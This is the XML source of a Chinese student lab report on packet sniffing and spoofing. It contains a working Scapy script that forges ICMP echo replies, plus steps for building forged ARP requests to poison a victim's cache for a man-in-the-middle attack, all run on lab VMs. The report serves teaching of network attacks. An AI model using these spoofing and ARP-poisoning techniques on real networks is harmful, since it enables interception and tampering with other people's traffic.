            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="18" name="图片 18" descr="{Y7J~8N4FH9P[_MGR2`4P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{Y7J~8N4FH9P[_MGR2`4P0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1.4. Sniffing and-then Spoofing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VM A为10.0.2.4，VM B为10.0.2.5，它们在一个LAN上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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VM B ping的IP地址为X。嗅探程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VM A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上，每当它看到ICMP回显请求时，不管目标IP地址是什么，程序应立即使用分组欺骗技术发送回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>考虑X机器是否还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，ping程序将始终收到一个答复，表明X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Step1. 编写代码fake.py</w:t>
      </w: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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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def print_pkt(pkt):</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a = IP()</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a.src = pkt[IP].dst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a.dst = pkt[IP].src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b = ICMP()</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b.type ="echo-reply"</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b.code =0</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b.id = pkt[ICMP].id</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b.seq = pkt[ICMP].seq</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p = a/b</w:t>
      </w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>send(p)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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pkt = sniff(filter='icmp[icmptype] == icmp-echo', prn=print_pkt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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Step2. VM A运行fake.py，VM B ping目标IP地址X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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在VM A上不运行fake.py时，VM B ping 58.192.118.142（www.seu.edu.cn的IP地址）的结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="1266190"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="15" name="图片 15" descr="J(75V4H`RXA$MXPP)77O]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J(75V4H`RXA$MXPP)77O]BK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可以看到，VM B成功收到了来自58.192.118.142（www.seu.edu.cn）的响应报文。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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在VM A上运行fake.py后，VM B再次ping 58.192.118.142，VM A和VM B的响应如下：（第一张为VM A，第二张为VM B）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="4SA311`)$18]OII)QXPYHT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4SA311`)$18]OII)QXPYHT5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect t="10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-39370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>384175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1746885" cy="1244600"/>
                <wp:effectExtent l="13970" t="1270" r="17145" b="2413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885" cy="1244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3.1pt;margin-top:30.25pt;height:98pt;width:137.55pt;z-index:251667456;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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zcyRzNgA&#10;AAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQCJC&#10;O9hYAgAAiwQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEA&#10;APEFAAAAAA==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sz w:val="2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-20320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>612140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4921250" cy="1206500"/>
                <wp:effectExtent l="13970" t="1270" r="17780" b="24130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1250" cy="1206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.6pt;margin-top:48.2pt;height:95pt;width:387.5pt;z-index:251677696;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Ggx/HdgA&#10;AAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQOpo&#10;JzJYAgAAiwQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEA&#10;APEFAAAAAA==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sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1925955"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="16" name="图片 16" descr="8EEQV[8WNIFHNCM0ULDV@V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8EEQV[8WNIFHNCM0ULDV@VP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可以看到，除了真正来自58.192.118.142的ICMP响应报文外，VM B还额外收到了（截断的）4个8字节的ICMP响应报文，刚好对应于第一张图中VM A伪造的4个ICMP响应报文。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="2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所以，利用Scapy，无论IP X是否在线，都能够收到伪造的源地址为X的ICMP响应报文。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Part2——Packet Sniffing and Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>地址解析协议（ARP）是一种用于发现链路层的通信协议地址，如MAC地址，给定一个IP地址。ARP协议是一个非常简单的协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>它没有实施任何安全措施。ARP缓存中毒攻击是一种常见的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在这种攻击下，攻击者可以欺骗受害者接受伪造的IP到MAC映射。这会导致受害者的数据包被重定向到带有伪造MAC的计算机上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>B’s IP address --&gt; M’s MAC address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个实验的目的是了解ARP缓存中毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可能造成的损害。特别是，学生将使用ARP攻击发起中间人攻击，攻击者可以拦截和修改两个受害者A和B之间的数据包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars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ARP Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此任务的目的是使用包欺骗对目标发起ARP缓存中毒攻击，这样，当两个受害者机器A和B试图相互通信时，它们的数据包将被被攻击者拦截，攻击者可以对数据包进行更改，从而成为介于A和B之间的人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这就是所谓的中间人攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MITM攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。在这个实验室里，我们使用ARP中毒进行MITM攻击。 下面的代码骨架显示了如何使用Scapy构造ARP数据包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="2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尝试用以下方式来进行ARP缓存污染攻击，并且展示攻击是否成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Task1A . using ARP request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在主机M上构造ARP请求包并发送到主机A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>A的ARP缓存，看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>M的MAC地址是否映射B的IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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  <w:t>Step1. 在VM M上写程序request.py，构造一个ARP请求报文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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如下图所示，为了使VM A存入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的IP地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--&gt; M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的MAC地址的错误映射，应当构造一个源IP地址为B的IP（psrc=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.0.2.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），源MAC地址为M的MAC地址（hwsrc="08:00:27:74:e8:d0"），目的地址为A的IP地址（pdst="10.0.2.4"）的报文。报文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的op选项设为1，表示为请求报文；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26080" cy="2602230"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1270"/>
            <wp:docPr id="41" name="图片 41" descr="Y4IN67`UCPG`BWN])`L}Z}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Y4IN67`UCPG`BWN])`L}Z}P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  <w:t>Step2. 在VM A上打开wireshark抓包，观察抓包结果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-39370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>427355</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5359400" cy="190500"/>
                <wp:effectExtent l="13970" t="1270" r="24130" b="2413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40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3.1pt;margin-top:33.65pt;height:15pt;width:422pt;z-index:251764736;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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aQVrV1wAAAAgB&#10;AAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAkLrQ61UC&#10;AACKBAAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA7QUA&#10;AAAA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67960" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="26" name="图片 26" descr="IXH3~{MHW%T1[{{R)(PX1@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XH3~{MHW%T1[{{R)(PX1@T"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="335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可以看到，VM A上可以抓到来自10.0.2.5且MAC地址08:00:27:74:e8:d0的ARP请求报文，具体信息如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24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-26670</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1522095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5359400" cy="330200"/>
                <wp:effectExtent l="13970" t="1270" r="24130" b="24130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40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.1pt;margin-top:119.85pt;height:26pt;width:422pt;z-index:251700224;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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iPRhp2gAA&#10;AAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAuAH2&#10;o1UCAACKBAAADgAAAAAAAAABACAAAAApAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA&#10;8AUAAAAA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sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2271395"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="27" name="图片 27" descr="26DAG{D5]_@`G8S$}$R)~2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6DAG{D5]_@`G8S$}$R)~2N"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="450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尽管10.0.2.5真实对应的MAC地址是B的MAC地址，但是这里的ARP请求报文的源MAC地址成功映射为M的MAC地址08:00:27:74:e8:d0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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  <w:t>Step3. 在VM A上用arp -a指令查看ARP缓存</w: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-134620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>390525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5359400" cy="190500"/>
                <wp:effectExtent l="13970" t="1270" r="24130" b="2413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08380" y="4805045"/>
                          <a:ext cx="535940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0.6pt;margin-top:30.75pt;height:15pt;width:422pt;z-index:251678720;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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4ZiSL1wAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAU&#10;AAAACACHTuJAr8qKI2QCAACWBAAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54bWxQSwUG&#10;AAAAAAYABgBZAQAA/AUAAAAA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67960" cy="899160"/>
